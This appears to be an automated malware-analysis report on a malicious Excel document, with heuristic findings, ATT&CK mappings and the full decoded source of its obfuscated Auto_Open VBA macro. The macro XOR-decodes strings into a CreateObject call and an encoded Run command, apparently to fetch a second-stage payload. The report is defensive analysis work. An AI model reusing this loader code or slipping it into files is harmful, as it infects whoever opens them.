MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Excel document containing an Auto_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro uses CreateObject and obfuscated strings to likely download and execute a second-stage payload. The document body explicitly prompts the user to 'Enable' Content, indicating a social engineering lure.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2086 bytes |
SHA-256: 2384685e7e09c7c869a6a89644e38ddb33d4f0440d449593f2b33fe1b3521dd0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AMJS"
Function qxa4(str As String) As Variant: Dim bytes() As Byte: bytes = str: qxa4 = bytes: End Function
Function msan(bytes() As Byte) As String: Dim str As String: str = bytes: msan = str: End Function
Function v9zafz26(str As String) As String
Const p_ As String = "w42dvasy"
Dim sb_() As Byte, pb_() As Byte
sb_ = qxa4(str)
pb_ = qxa4(p_)
Dim uL As Long
uL = UBound(sb_)
ReDim scb_(0 To uL) As Byte
Dim idx As Long
For idx = LBound(sb_) To uL:
If Not sb_(idx) = 0 Then
c = sb_(idx)
For i = 0 To UBound(pb_):
c = c Xor pb_(i)
Next i
scb_(idx) = c
End If
Next idx
v9zafz26 = msan(scb_)
End Function
Public Sub Auto_Open()
Set asd = CreateObject(v9zafz26(chr(95)) & v9zafz26(chr(91)) & v9zafz26("k" & "") & v9zafz26(chr(122) & "" & chr(97) & "x" & "|") & v9zafz26("&" & "") & v9zafz26(chr(91)) & v9zafz26("`" & "") & v9zafz26(chr(109) & "") & v9zafz26("d" & "" & "d"))
asd.Run v9zafz26("e" & "") & v9zafz26("{" & "" & chr(96)) & v9zafz26(chr(124) & "" & "i" & "(" & chr(96)) & v9zafz26("|") & v9zafz26("|") & v9zafz26("x") & v9zafz26("2" & "") & v9zafz26(chr(84) & "") & v9zafz26(chr(84) & "") & v9zafz26(chr(98) & "" & "&" & "") & v9zafz26("e" & "") & v9zafz26(chr(120) & "" & "'" & ":" & " " & chr(113) & "" & "<" & "" & "=" & chr(95) & "g" & "")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.